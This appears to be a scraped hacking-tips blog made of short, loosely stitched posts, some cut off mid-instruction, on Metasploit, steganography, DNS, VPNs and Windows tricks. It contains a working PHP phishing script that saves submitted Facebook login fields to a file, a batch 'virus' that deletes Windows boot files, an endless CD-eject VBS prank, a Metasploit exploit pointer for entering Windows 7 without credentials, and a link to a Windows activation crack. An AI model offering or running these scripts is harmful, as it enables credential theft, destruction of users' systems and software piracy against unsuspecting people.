Hack windows 7 with Metaspoit using kali linux

Exploiting a windows vulnerability to logging into the system without username and password using Metasploit.

Requirements:

1. MetaSploit Installed (Kali Linux Distribution)

2. Ruby Installed (Install all the package of Ruby to avoid any issues)

3. Two OS running either on same as virtual or physically different

Machine 1:  Host   Kali Linux Machine

Machine 2: Target Windows 7 Machine (32 bit).

To lounch metasploit, enter msfconsole at command line

#msfconsole

Now once you get the msf prompt type the below command  and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader.

data hiding behind image (steganography)

Steganography is a method  of  hiding data in another message so that the very existence of  the data is concealed . Steganography is mainly used by hiding message in graphic images  .The least significant bit of each byte of the image  can be replaced with bits of the secret message .


lets see how  can  be hide message  behind the image.

required > one secret message txt file and  main image  file

* put the  secret.txt and  main.jpg on  the desktop

 this  is  secret  message  name as  secret.txt file  and  another  is  image  file  behind  which secret message are to hide in  my  case i  am using  the  image  file name  as  main.jpg

* open cmd (command prompt)
* type "cd Desktop"  (withot quetetion)
* type again  "copy /b main.jpg + secret.txt  steg.jpg

Hide data using NTFS stream.

NTFS file system in windows allows you to store data behind a file name with the use of a stream name it's not detectable browsing the file system  any where within windows . It can be access it with secret key which are name of the stream

NTFS file system stream contain the data that is written to a file .

DNS HACKING

>> DNS HACKING <<

1 DNS BASICS

2 RESOURCE RECORDS AND THE ZONE FILE

3 DNS LOOKUP AND  REVERSE  DNS  LOOKUP

4 DNS ZONE TRANSFER                  

5 WHY SECURITY ISSUE OF ZONE TRANSFERING

6 CONCLUSION

1          Dns Basics:- DNS converts human readable domain names into IP-addresses. This is because domain names are much easier to remember than IP-addresses. This process may take place through a local cache or through a zone file that is present on the server. A zone file is a file on the server that contains entries for different Resource Records (RR).

This  process can be  understand by this  example let’s assume  that  you write in  URL  bar of  browser “www.google.com”  the  this  query first  goes to DNS  server  their  resolve  the site  name  in Ip address and  then  goes  to  query for   web  page   of  google com  to  web. server.

                                                                                  It’s not  easy  task  to  remember every IP  address  of various  web site. so  there  DNS  resolver  work  to  resolve  website  name into  IP  address .

Ex. (Generally all people stored  phone  no.  by particular  person’s  name  )   .

                                                                                                                     

Bypass Age Restrictions On YouTube Videos.

you  want  to  watch video ever on  youtube  but couldn't  becuase it is age  restricted  and  may  be  you  have no  account  . so  this  article  will  teach you how  to  bypass restriction on youtube.

here  url  is  http://www.youtube.com/watch?v=MlPH_ycy62s

from here replace   watch?v=  by  v/  and  press enter

you have done it 

enjoy yourself :)

WORKING AS ANNONYMOUS USING VPN ( virtual private network)..!

what is  vpn  and  how   is   it  usefull  ?

A virtual private network (VPN) extends a private network across a public  network, such as the internet. It enables a computer to send and receive data across shared or public networks as if it is directly connected to the private network, while benefiting from the functionality, security and management policies of the private network
Consumers use a private VPN service, also known as a VPN tunnel, to protect their online activity and identity. By using an anonymous VPN service, a user's Internet traffic and data remain encrypted which prevents eavesdroppers from sniffing Internet activity.  A VPN service is especially useful when accessing public wi-fi, hotspot because the public wireless services might not be secure. In addition to public Wi-Fi security, a private VPN service also provides consumers with uncensored Internet access and can help prevent data theft and unblock websites.

FACEBOOK account hack and prevention to hack. ....!(PHISHING METHOD)

Hi  guys,
              this  tutorial  is  only education purpose  today  i m going  to tell  you  how  to  hack  facebook  acount and   preventing  to  himself   be  victim  ..

what is  phising  ?
Phishing is the act of attempting to acquire sensitive  information such as usernames,passwords, and  credit cards details (and sometimes, indirectly money) by masquerading as a trustworthy entity in an electronic communication.

1. copy  the  following  code and  paste  in   notepad

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

REMOVING "WINDOWS IS NOT GENUINE".........!

hi guys,
              we use generally free available windows  o.s  and  after some days or months it show  the  "windows is not genuine  get  genuine  now"  with black  screen  .  It's  look  so irritable  and  today  i'll   explain  how  get remove this  message .......... :)

1. open  the cmd  "run as administrator"

2.and type " slmgr -rearm " (without quotation mark)

3.restart system  and u will find  there is not any message on  bottom corner of  monitor.........

**//this  trick  increase time  of  genuine  of  o.s  only  not permanent //**

so can use the  tool  "wga remover "..!

https://www.dropbox.com/s/hlpl1tsrunwy8wu/Windows%20Genuine%20Hack.zip

WGA tests the authenticity of Windows every day, collects and conveys data to Microsoft server even if according to all indications everything is ok with the license. In other words, its main task is of more spy character that consists in collecting of information behind your back.

take care enjoy  yourself..... :)

LOGIN GUI MODE WITHOUT "STARTX" IN BACKTRACK MACHINE..........!

1> open terminal  in bt(backtrack)
2> type " apt-gte install gdm"
3> type "vim /etc/rc.local" 

3>for  typing press "i"  and type /usr/sbin/gdm &

4> pres esc + : wq ( for write and quite)

note>:
**//remember to leave exit0 as the  last line  in /etc/rc.local  //**

5 > now  reboot  your bt machine

enjoy your self  :)

Running NETSETTER in backtrack machine .......!

Hi guys,
              we use the backtrack  o.s  in  virtual machine  and  use the  internet  by sharing internet from  main machine   but   when we want to  use  internet with real  ip   then  how  to  use  this  so  i  explain  in  following post ..... !


   first download  the  file  from this link ....
 http://www.mediafire.com/download/8j1jo2v4mnkx4gb/3gusbmodem

put this  file on desktop of  backtrack machine

open terminal  (ctrl+ alt + t) in backtrack 5r3

type

1> cd Desktop/

2> chmod a+x 3gusbmodem

3> ./3gusbmodem --interactive

 

 4> connetct with 3g

5> usb device

6>usb modem

7>reported by you modem

in this section requird  the apn  (acess point name )

i use the  reliance  sim  and  it's  apn  is  rcom 

8>typing your  own apn  name

you wil  get connected

 and  use the  internet with real ip

enjoy yourself ...... :)

"currupting bootloader" by making notepad virus ...... !

this  post is  only education purpose ;
**//do  your own risk  and  don't attempt on your system.....//**

1> open notepad  and  type  following  code...


@echo off

attrib -r -s -h c:autoexec.bat

del c:autoexec.bat

attrib -r -s -h c:boot.ini

del c:boot.ini

attrib -r -s -h c:ntldr

del c:ntldr

attrib -r -s -h c:windowswin.ini

del c:windowswin.ini


2> save  as *.bat 

A to Z run command .... !

Accessibility Controls - access.cpl
Add Hardware Wizard - hdwwiz.cpl
Add/Remove Programs - appwiz.cpl
Administrative Tools - control admintools
Automatic Updates - wuaucpl.cpl
Bluetooth Transfer Wizard - fsquirt
Calculator - calc
Certificate Manager - certmgr.msc
Character Map - charmap
Check Disk Utility - chkdsk
Clipboard Viewer - clipbrd
Command Prompt - cmd
Component Services - dcomcnfg
Computer Management - compmgmt.msc
Date and Time Properties - timedate.cpl
DDE Shares - ddeshare
Device Manager - devmgmt.msc
Direct X Control Panel (If Installed)* - directx.cpl
Direct X Troubleshooter - dxdiag
Disk Cleanup Utility - cleanmgr
Disk Defragment - dfrg.msc
Disk Management - diskmgmt.msc
Disk Partition Manager - diskpart
Display Properties - control desktop
Display Properties - desk.cpl
Display Properties (w/Appearance Tab Preselected) - control color
Dr. Watson System Troubleshooting Utility - drwtsn32
Driver Verifier Utility - verifier
Event Viewer - eventvwr.msc
File Signature Verification Tool - sigverif
Findfast - findfast.cpl
Folders Properties - control folders
Fonts - control fonts
Fonts Folder - fonts
Free Cell Card Game - freecell
Game Controllers - joy.cpl
Group Policy Editor (XP Prof) - gpedit.msc
Hearts Card Game - mshearts
Iexpress Wizard - iexpress
Indexing Service - ciadv.msc
Internet Properties - inetcpl.cpl
IP Configuration (Display Connection Configuration) - ipconfig /all
IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns
IP Configuration (Release All Connections) - ipconfig /release
IP Configuration (Renew All Connections) - ipconfig /renew
IP Configuration (Refreshes DHCP & Re - Registers DNS) -
ipconfig /registerdns
IP Configuration (Display DHCP Class ID) - ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid
Java Control Panel (If Installed) - jpicpl32.cpl
Java Control Panel (If Installed) - javaws
Keyboard Properties - control keyboard
Local Security Settings - secpol.msc
Local Users and Groups - lusrmgr.msc
Logs You Out Of Windows - logoff
Microsoft Chat - winchat
Minesweeper Game - winmine
Mouse Properties - control mouse
Mouse Properties - main.cpl
Network Connections - control netconnections
Network Connections - ncpa.cpl
Network Setup Wizard - netsetup.cpl
Notepad - notepad
Nview Desktop Manager (If Installed) - nvtuicpl.cpl
Object Packager - packager
ODBC Data Source Administrator - odbccp32.cpl
On Screen Keyboard - osk
Opens AC3 Filter (If Installed) - ac3filter.cpl
Password Properties - password.cpl
Performance Monitor - perfmon.msc
Performance Monitor - perfmon
Phone and Modem Options - telephon.cpl
Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder - printers
Private Character Editor - eudcedit
Quicktime (If Installed) - QuickTime.cpl
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately) - sfc /scannow
System File Checker Utility (Scan Once At Next Boot) - sfc /scanonce
System Properties - sysdm.cpl
Task Manager - taskmgr
Telnet Client - telnet
User Account Management - nusrmgr.cpl
Utility Manager - utilman
Windows Firewall - firewall.cpl
Windows Magnifier - magnify
Windows Management Infrastructure - wmimgmt.msc
Windows System Security Tool - syskey
Windows Update Launches - wupdmgr
Windows XP Tour Wizard – tourstart
Wordpad – w

simple notepad virus ....!

open  cdrom randomly... !

 1> open notepad
2> type following code

"Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If"


3> save this file as  *.vbs 

click  on this file  and  enjoy yourself..... :)